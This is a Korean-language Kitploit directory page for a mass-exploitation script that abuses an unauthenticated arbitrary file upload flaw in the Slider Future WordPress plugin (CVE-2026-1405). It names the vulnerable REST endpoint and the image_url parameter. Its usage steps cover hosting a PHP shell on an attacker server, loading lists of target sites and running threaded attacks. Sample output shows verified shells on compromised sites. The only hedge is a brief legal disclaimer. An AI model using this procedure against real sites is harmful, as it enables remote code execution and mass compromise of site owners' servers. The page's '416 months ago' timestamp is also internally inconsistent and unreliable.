Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-1405 — Slider Future <= 1.0.5 - 인증되지 않은 임의 파일 업로드 | Kitploit
도구/GitHubGitHub/nxploited/cve-2026-1405
Payload GenerationExploitationScripting & AutomationWeb Application ExploitationPenetration TestingRed Teaming
GitHubnxploited/cve-2026-1405

CVE-2026-1405

Slider Future <= 1.0.5 - 인증되지 않은 임의 파일 업로드

저장소 보기
416개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-1405

Slider Future <= 1.0.5 - 인증되지 않은 임의 파일 업로드

🚀 CVE-2026-1405.py — Slider Future 대량 익스플로잇 도구

🩸 취약점 개요

구성 요소: Slider Future (WordPress 플러그인)
영향받는 버전: ≤ 1.0.5
취약점: 인증되지 않은 임의 파일 업로드
CVE: CVE-2026-1405
CVSS 점수: 9.8 (치명적)

WordPress용 Slider Future 플러그인은 1.0.5까지의 모든 버전에서 slider_future_handle_image_upload 함수의 파일 유형 검증 누락으로 인해 임의 파일 업로드 취약점에 노출됩니다. 이로 인해 인증되지 않은 공격자가 악성 PHP 셸을 포함한 모든 파일 유형을 영향을 받는 서버에 직접 업로드하여 원격 코드 실행이 가능해집니다.


⚡ 익스플로잇 기능

  • 여러 대상에 대한 대량 익스플로잇.
  • 취약한 엔드포인트 사용: /wp-json/slider-future/v1/upload-image/
  • image_url 매개변수를 통해 원격 PHP 셸 업로드 (인증 불필요).
  • 사용자 정의 시그니처를 확인하여 셸 실행을 자동으로 검증.

🛠️ 사용 방법

1. 대상 WordPress 사이트가 포함된 텍스트 파일을 준비하세요 (줄마다 하나씩):

root@kitploit:~
http://example1.com
https://example2.com
...

2. PHP 셸을 온라인에 호스팅하고 직접 URL을 준비하세요.

예시: http://yourserver.com/shell.php

3. 스크립트 실행:

root@kitploit:~
python3 CVE-2026-1405.py

다음 항목을 입력하라는 메시지가 표시됩니다:

  • 대상 파일: 대상 목록의 경로 (기본값: list.txt)
  • 셸 직접 URL: 대상에 업로드할 온라인에서 접근 가능한 셸
  • 셸 시그니처: 검증을 위한 셸 내 고유 문자열 (예: Nxploited)
  • 스레드: 병렬 스레드 수 (기본값: 10)

4. 출력

  • 익스플로잇 결과는 전문적인 Rich 기반 인터페이스에서 실시간으로 표시됩니다.
  • 성공한 대상과 셸 URL은 success_results.txt에 자동으로 저장됩니다.

📝 스크립트 상세 정보

  • 이름: CVE-2026-1405.py
  • 작성자: Nxploited
  • 언어: Python 3
  • 라이브러리: requests, rich

작동 방식

  1. 각 대상의 취약한 엔드포인트에 POST 요청을 전송합니다:
    • URL: /wp-json/slider-future/v1/upload-image/
    • 매개변수: 셸을 가리키는 image_url.
  2. JSON 응답을 파싱하여 업로드된 셸 URL을 추출합니다.
  3. 셸 URL에 접속하여 시그니처 문자열을 검색합니다.
  4. 각 대상의 상태(성공 또는 실패)를 표시합니다.

⚠️ 법적 고지

이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용해야 합니다.
소유하지 않았거나 명시적 테스트 권한이 없는 사이트에 대한 무단 사용은 불법입니다.


💡 예시 출력

root@kitploit:~
Exploit For: CVE-2026-1405
By: Nxploited

Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited

2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt
도구 다운로드